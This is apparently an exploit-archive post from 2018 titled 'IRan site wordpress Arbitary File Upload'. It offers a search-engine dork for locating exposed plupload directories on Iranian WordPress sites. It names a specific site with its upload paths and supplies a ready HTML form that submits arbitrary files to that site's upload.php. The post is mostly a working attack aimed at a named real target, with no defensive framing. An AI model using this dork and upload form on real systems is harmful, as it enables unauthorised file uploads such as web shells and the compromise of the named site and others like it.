facebook facebook twitter rss

IRan site wordpress Arbitary File Upload

Author: Rednofozi , Published: 30-08-2018
########################################## 

# Exploit Title : IRan site wordpress Arbitary File Upload

# Dork : inurl:/plupload/ -inurl:(php) intitle:index of site:ir

# Date : 2018

# Exploit Author: Rednofozi

# Category: Webapps

# Language: PHP

# Tested on: windows 10 / FireFox
#myteam:https://anonysec.org/




Info : ______________________________________________________________________



#view : https://www.ariarockwool.ir/wp-includes/js/
#Test Upload :https://www.ariarockwool.ir/wp-includes/js/plupload/l/media/vendor/plupload/examples/upload.php



______________________________________________________________________

#Tools :



<!DOCTYPE html>

<html>

<body>



<form action="https://www.ariarockwool.ir/wp-includes/js/plupload/upload.php" method="post" enctype="multipart/form-data">



<input type="file" name="file" id="file">

<input type="submit" value="Upload" name="submit">

</form>



</body>

</html>

______________________________________________________________________



# Discovered by : Rednofozi





#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :